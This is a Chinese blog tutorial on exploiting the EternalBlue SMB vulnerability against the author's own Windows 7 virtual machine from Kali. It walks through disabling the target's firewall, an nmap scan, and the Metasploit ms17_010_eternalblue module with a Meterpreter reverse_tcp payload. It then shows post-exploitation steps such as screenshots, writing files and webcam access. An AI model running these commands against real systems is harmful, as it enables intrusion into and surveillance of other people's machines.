【EternalBlue】利用永恒之蓝漏洞渗透攻击教程

当初被永恒之蓝吸引,是因为觉得这个名字还取得挺好听的,有点神秘还有点浪漫色彩。关于永恒之蓝的原理就不多解释了哈,在这里主要演示一下如何利用永恒之蓝进行渗透。

演示环境

虚拟机软件:
名称:VMware® Workstation 15 Pro
版本号:15.1.0 build-13591040
下载地址:https://my.vmware.com/cn/web/vmware/downloads/info/slug/desktop_end_user_computing/vmware_workstation_pro/16_0
攻击机:
名称:Kali
版本号:kali-linux-2020.3-installer-amd64
下载地址:https://mirrors.aliyun.com/kali-images/kali-2020.3/
靶机:
名称:Win7
版本号:cn_windows_7_enterprise_x64_dvd_x15-70741
密钥:网络上随便一搜就有
下载地址:https://msdn.itellyou.cn/

实验准备

靶机Win7

一、关闭防火墙
image.png
使用netsh firewall show state命令
检查防火墙是否正确关闭
(操作模式为禁用)
image.png

二、获取Win7的IP地址
使用ipconfig命令获取IP地址
所以靶机的IP地址为:192.168.204.140
image.png

攻击机Kali

一、获取kali的IP地址(可省略)
为了能使用ifconfig命令,这里要先切换到root哦,切换命令sudo su
使用ifconfig命令查询Kali的IP地址。
所以攻击机的IP地址为:192.168.204.141
image.png

二、测试攻击机和靶机之间的连通性
这里让Kali使用ping命令
ping 192.168.204.140
(如果ping执行的时候卡住了,关掉窗口重来一次)
image.png

三、使用nmap扫描靶机
使用命令nmap 192.168.204.140
可以看到445端口是开放的
image.png

漏洞渗透

一、启动msf
使用命令msfconsole
出现的图案可能不一样
image.png

二、搜索eternalblue
使用命令search eternalblue
image.png

三、选择eternalblue
这里我们选择第二个
使用命令**use exploit/windows/smb/ms17_010_eternalblue
注意命令手打的时候别打错了啊
image.png

四、配置信息
1、先用show options命令熟悉一下
会显示一些详细信息
Required的yes表示必须有值
这里看到LHOST(攻击机)和LPORT(监听端口)都是有值的,此处要保证监听端口(4444端口)是不被占用的状态哦,或者也可以自行设置。
image.png
2、设置攻击目标RHOSTS
使用命令set rhost 192.168.204.140
image.png
3、设置攻击载荷payload
可以先使用show payloads命令查看有哪些payloads
image.png
使用命令set payload windows/x64/meterpreter/reverse_tcp
image.png

五、开始渗透吧!
使用run或者exploit命令渗透攻击。
最下面显示WIN表示渗透成功
如果显示FAIL,可以重新再试试
image.png

功能测试

到这一步,我们就渗透成功啦,也就是获取到了靶机的管理员权限。
接下来进行一些操作证实这一点。
一、获取IP地址
使用命令ipconfig
可以看到确实是靶机Win7的IP地址。
image.png

二、截取靶机桌面
1、使用命令screenshot
image.png
2、查看保存到的截图
出了点小小的意外,由于我是以普通用户的身份进来的,所以没有权限查看/root里面的文件内容。
接下来的操作是将截图移动到/home/northwest/下面,方便我这个没有root权限的普通用户查看。
使用命令mv fUKNpRUJ.jpeg /home/northwest/
image.png
这样图片就到了/home/northwest/下面
image.png
正是从Win7捕获到的屏幕截图
image.png

二、写文件到靶机
这里使用命令:
cd C:\Users\Lenovo\Desktop
mkdir eternalblue
edit I_am_kali.txt
这样就在Win7的桌面创建了一个名为eternalblue的文件夹和一个名为I_am_kali的txt文件。
(并且在txt里写下了一些内容,按i进入插入模式,写完后,先按Esc,再按:wq退出并保存)
image.png
可以在Win7看到该文件夹和文件
image.png

这里仅仅进行几个简单的操作来验证,总而言之,我们获取到了靶机Win7的管理员权限,可以对它为所欲为。(说起来我当初开了摄像头,然后就看到了一个头发凌乱,穿着小熊睡衣,怀里还抱着一袋山药脆片的我......当时差点就被寄几丑到去世。)

原理没有讲解,步骤写得也有点啰嗦。
有什么问题欢迎大家一起讨论哦。
谢谢您的浏览!90度鞠躬!

posted on 2020-11-03 02:13  northwest  阅读(1177)  评论(0编辑  收藏  举报

导航